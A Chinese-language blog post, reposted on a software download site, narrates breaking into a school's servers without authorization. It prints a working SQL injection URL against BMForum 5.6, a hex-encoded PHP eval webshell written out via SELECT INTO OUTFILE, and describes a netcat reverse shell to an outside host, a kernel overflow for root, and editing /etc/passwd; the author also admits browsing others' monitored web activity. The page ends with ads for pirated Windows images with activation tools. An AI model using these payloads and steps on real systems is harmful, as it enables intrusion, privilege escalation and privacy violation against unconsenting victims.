linux系統(tǒng)從入侵到提權(quán)的詳細(xì)過程(圖文)
前奏:无意间拿下了学校一台检测网络访问的服务器,无意间看到一个远程登录的信息,遂对此网段扫描了一下80端口。。。
上个J8,就是那个上网检测东西。。
其实记录的很详细,没有加密的聊天内容都可以看到。我还是比较尊重他人隐私的,所以只查看了一些上网行为。
刚才说了,扫了一下那个网段的80端口,有一个开着,就点进去看了一下,是BMForum 2007 5.6的论坛,php的。
老系统了,记得前几年爆了个注入,也不知道是不是这个版本,上db-exploit看了一下,艹,中枪了。
————————-下面的来自db-exploit————————
BMForum 5.6 (tagname) Remote SQL Injection Vulnerability
Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit:
http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*
# milw0rm.com [2008-10-01]
于是乎….
不用猜你就懂了,密码是admin。
进后台了,这个模式我不是很喜欢,翻了半天没找到能上传的地方。上J8。
不过,还是好好找,依然能找到可以利用的东西,发现了这个后台有phpinfo()和SQL执行。
看了一下,是root权限,也得到了web目录,如果没开启魔术引号,可以考虑into outfile。
补一句:mysql的root权限在linux下一般没什么用,有写权限就不错了,如果是windows系统,可以考虑导出udf.dll。
管理员百密一疏啊,没开魔术引号~~蛤蛤,大快人心!!~
直接select一句话木马,然后导出到文件~~
下面那一段十六进制字符串是www.jb51.net <?php eval($_REQUEST[fuck]);?> 的hex值
select 0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3E into outfile ‘/usr/local/bmf/bmb/datafile/x.php’
然后成功得到shell。如图。
接下来,试试菜刀里能不能执行命令,下面就要考虑提权了。
试了一下,看似可以执行命令,也得到了一些服务器信息。
2.6.9-22的内核,有溢出。
这个终端有个毛病,就是不能即时回显,毕竟是通过webshell虚拟的终端,所以,还需要nc来反弹一个shell,用于溢出。
这个服务器上已经装了nc,可是是阉割过的,不能指向bash,所以,下载源码,编译。
用wget在sourceforge.net上下载,就不多说了。。
编译什么的,也是so easy。实在不行就百度一个i386架构下编译的linux版netcat。
下面的工作就是要反弹shell了,一台外网的机子是必须的,就算不是外网,能映射也行。
刚好手头有个映射过端口的服务器,如果是外网服务器,就更简单了,详见netcat使用帮助。
http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html
好了,开始反弹吧。。。
很好,反弹成功,已经可以执行一些低权限的命令的。
接着提权吧。上传了一个叫做“x”的程序,用于溢出。
蛤蛤,溢出成功了,已经是root权限了,下面加用户什么的就不说了,你懂的~~
唠叨一句,变身成root的方法。。。修改/etc/passwd
这是我用pietty连接ssh之后,查看passwd,已经改成root了
作者 sunrise@luzix.com from:情'blog
推薦系統(tǒng)
雨林木風(fēng) winxp下載 純凈版 永久激活 winxp ghost系統(tǒng) sp3 系統(tǒng)下載
系統(tǒng)大?。?/em>0MB系統(tǒng)類型:WinXP雨林木風(fēng)在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國(guó)內(nèi)重裝系統(tǒng)行業(yè)知名品牌,雨林木風(fēng)WindowsXP其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,是一款穩(wěn)定流暢的系統(tǒng),雨林木風(fēng) winxp下載 純凈版 永久激活 winxp ghost系統(tǒng) sp3 系統(tǒng)下載,有需要的朋友速度下載吧。
系統(tǒng)等級(jí):進(jìn)入下載 >蘿卜家園win7純凈版 ghost系統(tǒng)下載 x64 聯(lián)想電腦專用
系統(tǒng)大小:0MB系統(tǒng)類型:Win7蘿卜家園win7純凈版是款非常純凈的win7系統(tǒng),此版本優(yōu)化更新了大量的驅(qū)動(dòng),幫助用戶們進(jìn)行舒適的使用,更加的適合家庭辦公的使用,方便用戶,有需要的用戶們快來下載安裝吧。
系統(tǒng)等級(jí):進(jìn)入下載 >雨林木風(fēng)xp系統(tǒng) xp系統(tǒng)純凈版 winXP ghost xp sp3 純凈版系統(tǒng)下載
系統(tǒng)大?。?/em>1.01GB系統(tǒng)類型:WinXP雨林木風(fēng)xp系統(tǒng) xp系統(tǒng)純凈版 winXP ghost xp sp3 純凈版系統(tǒng)下載,雨林木風(fēng)WinXP系統(tǒng)技術(shù)積累雄厚深耕多年,采用了新的系統(tǒng)功能和硬件驅(qū)動(dòng),可以更好的發(fā)揮系統(tǒng)的性能,優(yōu)化了系統(tǒng)、驅(qū)動(dòng)對(duì)硬件的加速,加固了系統(tǒng)安全策略,運(yùn)行環(huán)境安全可靠穩(wěn)定。
系統(tǒng)等級(jí):進(jìn)入下載 >蘿卜家園win10企業(yè)版 免激活密鑰 激活工具 V2023 X64位系統(tǒng)下載
系統(tǒng)大小:0MB系統(tǒng)類型:Win10蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國(guó)內(nèi)重裝系統(tǒng)行業(yè)的蘿卜家園品牌,(win10企業(yè)版,win10 ghost,win10鏡像),蘿卜家園win10企業(yè)版 免激活密鑰 激活工具 ghost鏡像 X64位系統(tǒng)下載,其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,蘿卜家園win10純凈版是一款穩(wěn)定流暢的系統(tǒng),一直以來都以用戶為中心,是由蘿卜家園win10團(tuán)隊(duì)推出的蘿卜家園
系統(tǒng)等級(jí):進(jìn)入下載 >蘿卜家園windows10游戲版 win10游戲?qū)I(yè)版 V2023 X64位系統(tǒng)下載
系統(tǒng)大?。?/em>0MB系統(tǒng)類型:Win10蘿卜家園windows10游戲版 win10游戲?qū)I(yè)版 ghost X64位 系統(tǒng)下載,蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,打造了國(guó)內(nèi)重裝系統(tǒng)行業(yè)的蘿卜家園品牌,其系統(tǒng)口碑得到許多人認(rèn)可,積累了廣大的用戶群體,蘿卜家園win10純凈版是一款穩(wěn)定流暢的系統(tǒng),一直以來都以用戶為中心,是由蘿卜家園win10團(tuán)隊(duì)推出的蘿卜家園win10國(guó)內(nèi)鏡像版,基于國(guó)內(nèi)用戶的習(xí)慣,做
系統(tǒng)等級(jí):進(jìn)入下載 >windows11下載 蘿卜家園win11專業(yè)版 X64位 V2023官網(wǎng)下載
系統(tǒng)大小:0MB系統(tǒng)類型:Win11蘿卜家園在系統(tǒng)方面技術(shù)積累雄厚深耕多年,windows11下載 蘿卜家園win11專業(yè)版 X64位 官網(wǎng)正式版可以更好的發(fā)揮系統(tǒng)的性能,優(yōu)化了系統(tǒng)、驅(qū)動(dòng)對(duì)硬件的加速,使得軟件在WINDOWS11系統(tǒng)中運(yùn)行得更加流暢,加固了系統(tǒng)安全策略,WINDOWS11系統(tǒng)在家用辦公上跑分表現(xiàn)都是非常優(yōu)秀,完美的兼容各種硬件和軟件,運(yùn)行環(huán)境安全可靠穩(wěn)定。
系統(tǒng)等級(jí):進(jìn)入下載 >
相關(guān)文章
- 安卓手機(jī)QQ 4.7.2正式發(fā)布 顯示在線好友的網(wǎng)絡(luò)狀態(tài)
- 瑞星安全隨身WiFi怎么用 瑞星隨身WiFi有何亮點(diǎn)以及使用方法
- 您的WiFi安全嗎?讓路由衛(wèi)士來為您把關(guān)讓它變得更快,更安全
- 大勢(shì)至局域網(wǎng)共享文件管理軟件詳細(xì)記錄服務(wù)器共享文件訪問日志、保護(hù)共享文件安全
- 金山毒霸發(fā)布全新的V11新春版:殺毒速度更快/軟件凈化
- WinXP如何進(jìn)入安全模式?WinXP進(jìn)入安全模式設(shè)置
- 怎樣消除免費(fèi)WIFI的安全隱患?一張圖看懂免費(fèi)WIFI的安全隱患
- 毒app優(yōu)惠券怎么獲得 毒app無(wú)門檻優(yōu)惠券攻略
- 京東通信卡流量超標(biāo)怎樣關(guān)閉移動(dòng)網(wǎng)絡(luò)?
- 詳解火絨安全軟件怎么樣
- Win10系統(tǒng)下安全登錄失敗初始化失敗怎么辦?
- 360安全衛(wèi)士怎么更改默認(rèn)軟件?
- 360稱特斯拉應(yīng)用存漏洞 特斯拉不安全?
- win10安全模式跳過開機(jī)密碼可行嗎
熱門系統(tǒng)
推薦軟件
推薦應(yīng)用
推薦游戲
熱門文章
常用系統(tǒng)
- 1windows10家庭版下載 系統(tǒng)之家 x86改良版下載 戴爾筆記本專用
- 2Windows10電競(jìng)戰(zhàn)斗版下載 雨林木風(fēng)最新游戲版 x64位免密鑰 戴爾筆記本專用下載
- 3蘿卜家園win10專業(yè)版 Ghost系統(tǒng)鏡像下載安裝 V2022.06
- 4深度技術(shù)win10純凈版 免激活工具下載 x64位無(wú)病毒大神版 惠普電腦專用
- 5win10旗艦版系統(tǒng)下載 深度技術(shù)Windows10 x64位系統(tǒng)下載 永久激活
- 6蘿卜家園x64位純凈版 筆記本專用下載 win10無(wú)廣告不卡頓版 ghost鏡像下載
- 7技術(shù)員聯(lián)盟教育版國(guó)慶獻(xiàn)禮版下載 win10企業(yè)版 X64位 筆記本專用下載 v2023
- 8win7娛樂版 中文系統(tǒng) ghost x64位 win7激活密鑰 無(wú)需激活碼 iso鏡像下載
- 9蘿卜家園x86家庭版 win7改良版下載 win7鏡像系統(tǒng) 免激活工具下載